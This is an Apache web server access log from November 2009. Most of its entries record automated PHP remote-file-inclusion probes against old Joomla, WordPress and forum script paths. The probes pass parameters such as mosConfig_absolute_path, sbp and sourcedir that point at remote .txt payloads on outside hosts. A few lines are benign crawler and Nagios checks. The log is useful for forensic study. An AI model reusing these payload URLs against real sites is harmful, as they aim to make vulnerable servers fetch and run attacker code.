85.25.94.14 - - [13/Nov/2009:04:05:54 -0500] "GET //startdown.php?file=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
85.25.94.14 - - [13/Nov/2009:04:05:54 -0500] "GET /logs/access_log.Q109071700//startdown.php?file=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
222.236.221.38 - - [13/Nov/2009:04:06:00 -0500] "GET /logs/access_log.Q109080800%20%20//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
85.25.94.14 - - [13/Nov/2009:04:06:50 -0500] "GET /logs/access_log.Q109052100//admin.cropcanvas.php?cropimagedir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.803"
85.25.94.14 - - [13/Nov/2009:04:06:50 -0500] "GET //admin.cropcanvas.php?cropimagedir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.803"
85.25.94.14 - - [13/Nov/2009:04:06:51 -0500] "GET /logs//admin.cropcanvas.php?cropimagedir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.803"
85.25.94.14 - - [13/Nov/2009:04:06:51 -0500] "GET /logs/access_log.Q109071600//admin.cropcanvas.php?cropimagedir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.803"
222.236.47.182 - - [13/Nov/2009:04:06:58 -0500] "GET /logs/access_log.Q109080200%20%20//components/com_simpleboard/image_upload.php?sbp=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:04:06:59 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:04:06:59 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:04:07:32 -0500] "GET /logs/access_log.Q109081000//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:08:46 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:08:46 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:08:46 -0500] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:04:08:55 -0500] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:04:08:58 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:04:08:58 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:09:03 -0500] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:04:09:07 -0500] "GET /logs/access_log.Q109071900%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:04:09:10 -0500] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:09:54 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:09:54 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:09:54 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:09:54 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:10:00 -0500] "GET /logs/access_log.Q109102400//modules/xfsection/modify.php?dir_module=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:10:02 -0500] "GET /logs/access_log.Q109102400//modules/xfsection/modify.php?dir_module=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:04:10:35 -0500] "GET /?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:04:10:35 -0500] "GET /logs/access_log.Q109080700/?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:04:10:35 -0500] "GET /logs/?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:11:09 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:11:09 -0500] "GET /logs/access_log.Q109080200%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:11:09 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:11:29 -0500] "GET /logs/access_log.Q109062000%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:04:11:47 -0500] "GET /?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:04:11:47 -0500] "GET /logs/access_log.Q109080700/?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:04:11:47 -0500] "GET /logs/?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:04:11:48 -0500] "GET //index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:04:11:49 -0500] "GET /logs//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
66.249.67.245 - - [13/Nov/2009:04:11:55 -0500] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
174.143.155.52 - - [13/Nov/2009:04:12:00 -0500] "GET //index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:04:12:03 -0500] "GET /logs//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:04:12:04 -0500] "GET /logs/access_log.Q109080800%20%20//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:12:15 -0500] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:12:20 -0500] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
66.249.67.245 - - [13/Nov/2009:04:11:55 -0500] "GET /logs/access_log.Q109081100 HTTP/1.1" 200 5268662 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.25.94.14 - - [13/Nov/2009:04:12:40 -0500] "GET /logs/access_log.Q109052400//startdown.php?file=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
85.25.94.14 - - [13/Nov/2009:04:12:42 -0500] "GET /logs//startdown.php?file=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.803"
85.25.94.14 - - [13/Nov/2009:04:12:42 -0500] "GET //startdown.php?file=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
202.131.226.52 - - [13/Nov/2009:04:12:52 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:12:52 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:12:52 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:12:52 -0500] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:12:52 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:12:52 -0500] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:13:12 -0500] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:13:14 -0500] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:13:42 -0500] "GET /logs/access_log.Q109080200%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:04:13:47 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:04:13:47 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:04:13:47 -0500] "GET /logs/access_log.Q109080200%20%20//components/com_simpleboard/image_upload.php?sbp=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:13:50 -0500] "GET /logs/access_log.Q109062000%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.25.94.14 - - [13/Nov/2009:04:14:10 -0500] "GET /logs/access_log.Q109051800%20//startdown.php?file=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
85.25.94.14 - - [13/Nov/2009:04:14:16 -0500] "GET /logs/access_log.Q109062900%20//startdown.php?file=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
85.25.94.14 - - [13/Nov/2009:04:14:43 -0500] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
85.25.94.14 - - [13/Nov/2009:04:14:43 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
85.25.94.14 - - [13/Nov/2009:04:14:43 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
85.25.94.14 - - [13/Nov/2009:04:14:43 -0500] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
222.236.47.182 - - [13/Nov/2009:04:14:46 -0500] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.25.94.14 - - [13/Nov/2009:04:14:52 -0500] "GET /logs/access_log.Q109092200//admin.cropcanvas.php?cropimagedir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.803"
82.98.145.78 - - [13/Nov/2009:04:14:54 -0500] "GET /?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:04:14:54 -0500] "GET /logs/access_log.Q109080700/?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
82.98.145.78 - - [13/Nov/2009:04:14:54 -0500] "GET /logs/?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:04:15:04 -0500] "GET /logs/access_log.Q109080800%20%20//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:04:15:07 -0500] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.25.94.14 - - [13/Nov/2009:04:16:02 -0500] "GET /logs/access_log.Q109070700//admin.cropcanvas.php?cropimagedir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.803"
81.176.229.7 - - [13/Nov/2009:04:17:19 -0500] "GET /logs/access_log.Q109080700%20%20/?sourcedir=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:04:17:19 -0500] "GET /?sourcedir=http://www.hackengine.net/scan/id1?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:04:17:19 -0500] "GET /logs/?sourcedir=http://www.hackengine.net/scan/id1?? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:04:17:40 -0500] "GET /logs/access_log.Q109080700//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 253 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:04:17:40 -0500] "GET //yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 226 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:04:17:40 -0500] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 231 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:04:17:40 -0500] "GET /logs/access_log.Q109080700//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 253 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:04:17:40 -0500] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 231 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:04:17:40 -0500] "GET //yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 226 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:04:17:41 -0500] "GET /logs/access_log.Q109080700//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 253 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:04:17:41 -0500] "GET //yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 226 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:04:17:41 -0500] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 231 "-" "libwww-perl/5.831"
116.127.121.116 - - [13/Nov/2009:04:17:41 -0500] "GET /?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:17:41 -0500] "GET /logs/access_log.Q109080700/?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:17:41 -0500] "GET /logs/?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:17:45 -0500] "GET /logs/access_log.Q109080700/?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:17:45 -0500] "GET /?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:17:45 -0500] "GET /logs/?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:04:17:48 -0500] "GET /logs/error_log.Q109080700%20%20/?sourcedir=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:04:17:57 -0500] "GET /logs/error_log.Q109080700//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 252 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:04:17:57 -0500] "GET /logs/error_log.Q109080700//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 252 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:04:17:58 -0500] "GET /logs/error_log.Q109080700//yabbse/Sources/Packages.php?sourcedir=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 252 "-" "libwww-perl/5.831"
116.127.121.116 - - [13/Nov/2009:04:18:07 -0500] "GET /?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:18:07 -0500] "GET /logs/access_log.Q109080700%20%20/?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:18:07 -0500] "GET /logs/?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:18:08 -0500] "GET /?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:18:08 -0500] "GET /logs/access_log.Q109080700%20%20/?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:18:08 -0500] "GET /logs/?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:18:12 -0500] "GET /logs/access_log.Q109080200%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:18:18 -0500] "GET /logs/access_log.Q109062000%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:04:18:44 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:04:18:44 -0500] "GET /logs/access_log.Q109100200//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:04:18:44 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:04:18:52 -0500] "GET /logs/access_log.Q109080700/?sourcedir=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:04:18:52 -0500] "GET /?sourcedir=http://www.hackengine.net/scan/id1?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:04:18:52 -0500] "GET /logs/?sourcedir=http://www.hackengine.net/scan/id1?? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:19:05 -0500] "GET /logs/access_log.Q109080200%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:04:19:12 -0500] "GET /logs/access_log.Q109062000%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:04:19:14 -0500] "GET /logs/error_log.Q109080700/?sourcedir=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:04:20:41 -0500] "GET /logs/access_log.Q109061000//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Nov/2009:04:21:34 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.189.39.159 - - [13/Nov/2009:04:21:54 -0500] "GET /logs/access_log.Q109101700///skin/zero_vote/setup.php?dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.189.39.159 - - [13/Nov/2009:04:21:54 -0500] "GET /logs///skin/zero_vote/setup.php?dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.189.39.159 - - [13/Nov/2009:04:21:54 -0500] "GET ///skin/zero_vote/setup.php?dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
220.181.7.130 - - [13/Nov/2009:04:22:18 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
213.3.26.176 - - [13/Nov/2009:04:23:10 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
213.3.26.176 - - [13/Nov/2009:04:23:10 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
213.3.26.176 - - [13/Nov/2009:04:23:10 -0500] "GET /logs/access_log.Q109101200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
213.3.26.176 - - [13/Nov/2009:04:23:39 -0500] "GET /logs/access_log.Q109092900/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
213.3.26.176 - - [13/Nov/2009:04:23:39 -0500] "GET /logs/access_log.Q109100700/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:23:50 -0500] "GET /logs/access_log.Q109080700/?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:23:50 -0500] "GET /?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:23:50 -0500] "GET /logs/?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:23:54 -0500] "GET /?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:23:54 -0500] "GET /logs/access_log.Q109080700/?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:23:54 -0500] "GET /logs/?sourcedir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
